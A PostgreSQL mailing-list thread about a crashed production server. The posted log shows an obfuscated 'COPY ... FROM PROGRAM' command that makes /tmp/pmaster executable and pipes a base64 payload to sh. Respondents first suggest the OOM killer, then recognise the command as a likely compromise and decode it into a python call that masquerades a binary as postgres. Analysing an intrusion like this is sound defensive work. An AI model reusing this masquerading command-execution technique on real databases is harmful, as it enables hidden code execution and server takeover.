Discussion: PostgreSQL db crash and recovery mode
Hello all,
One of our production databases crashed and we got FATAL: the database system is in recovery mode. The OS and database versions are listed below. This is a Patroni cluster, and we use an rsync command in the archive_command parameter. The database log and /var/log/messages entries from the time of the event are also included below.
We could not work out why the database crashed. Could you guide us?
OS version: Red Hat Enterprise Linux Server release 7.9 (Maipo) (3.10.0-1160.36.2.el7.x86_64)
PostgreSQL db version: PostgreSQL 12.6 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
/var/log/messages output:
Oct 5 17:01:08 server01 abrt-hook-ccpp: Process 167619 (rsync) of user 26 killed by signal 3 - ignoring (unsupported signal)
db log:
2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856) was terminated by signal 9: Killed
2021-10-05 17:01:08.103 +03 20248 DETAIL: Failed process was running: COPY temp FROM PROGRAM 'chmod +x /tmp/pmaster; timeout 10; echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTEx
L2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg== | base64 -d | sh &' (ENCODING 'LATIN1');
2021-10-05 17:01:08.103 +03 20248 LOG: terminating any other active server processes
Regards.
Latif güdük <latifguduk@gmail.com> writes:
> One of our production database crashed and got FATAL: the database system
> is in recovery mode. You can find OS version and db version info below.

> 2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856)
> was terminated by signal 9: Killed

That is an external kill. If you didn't do it manually, it's most likely
the Linux OOM killer in action. See

https://www.postgresql.org/docs/current/kernel-resources.html#LINUX-MEMORY-OVERCOMMIT

regards, tom lane
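To follow up on the OOM-killer suggestion, one option is to pull the PID and signal out of the postmaster message and look for that PID in the kernel log. The sketch below is only an illustration: the function names are hypothetical, and the substrings used to spot OOM-killer reports ("Out of memory", "Killed process") are assumptions about the kernel's wording that should be checked against the actual /var/log/messages or dmesg output.

```python
import re

# Matches the postmaster message quoted in this thread.
TERMINATED_RE = re.compile(
    r"server process \(PID (?P<pid>\d+)\) was terminated by signal (?P<sig>\d+)"
)


def parse_termination(log_line):
    """Return (pid, signal) from a postmaster log line, or None if absent."""
    match = TERMINATED_RE.search(log_line)
    if match is None:
        return None
    return int(match.group("pid")), int(match.group("sig"))


def oom_lines_for_pid(kernel_log_lines, pid):
    """Return kernel log lines that mention pid and look like OOM reports.

    The marker substrings are assumptions, not a guaranteed kernel format.
    """
    pid_re = re.compile(r"\b%d\b" % pid)
    markers = ("Out of memory", "Killed process")
    return [
        line
        for line in kernel_log_lines
        if pid_re.search(line) and any(marker in line for marker in markers)
    ]


if __name__ == "__main__":
    db_line = (
        "2021-10-05 17:01:08.103 +03 20248 LOG: server process "
        "(PID 158856) was terminated by signal 9: Killed"
    )
    pid, sig = parse_termination(db_line)
    # In practice the lines would be read from /var/log/messages.
    messages = [
        "Oct 5 17:01:08 server01 abrt-hook-ccpp: Process 167619 (rsync) "
        "of user 26 killed by signal 3 - ignoring (unsupported signal)"
    ]
    print(pid, sig, oom_lines_for_pid(messages, pid))
```

An empty result for the single /var/log/messages line posted here does not rule the OOM killer in or out; the full kernel log around 17:01:08 would need to be searched.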
On Tue, Oct 5, 2021 at 10:58 PM Tom Lane <tgl@sss.pgh.pa.us> wrote:
>
> Latif güdük <latifguduk@gmail.com> writes:
> > One of our production database crashed and got FATAL: the database system
> > is in recovery mode. You can find OS version and db version info below.
>
> > 2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856)
> > was terminated by signal 9: Killed
>
> That is an external kill. If you didn't do it manually, it's most likely
> the Linux OOM killer in action.

The really worrying part is that it looks like your server has been
compromised and you should do something about it, unless you want to keep
mining bitcoins for strangers (or worse).

I'm assuming that you're trying to start postgres using obfuscation in
COPY command:

$ echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTExL2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg== | base64 -d
python -c 'import subprocess; proc = subprocess.Popen(["/usr/pgsql-11/bin/postgres"], executable="/tmp/pmaster").wait()'
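The same payload can be inspected without piping it through a shell. The following is a minimal sketch that only decodes the base64 text from the logged COPY ... FROM PROGRAM statement and prints it; the helper name `decode_payload` is made up for illustration, and nothing in the block executes the decoded command.

```python
import base64

# Payload copied from the COPY ... FROM PROGRAM statement in the db log,
# split into two literals only to keep the lines short.
PAYLOAD_B64 = (
    "cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTEx"
    "L2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg=="
)


def decode_payload(b64_text: str) -> str:
    """Decode base64 text to a string for reading; nothing is executed."""
    raw = base64.b64decode(b64_text, validate=True)
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(decode_payload(PAYLOAD_B64))
```

In the decoded command, `subprocess.Popen` is given `executable="/tmp/pmaster"`, so the program actually run is /tmp/pmaster while the first list element, /usr/pgsql-11/bin/postgres, is passed as the process name. That would make the process look like a postgres binary in a process listing, which is consistent with the suspicion of a compromise.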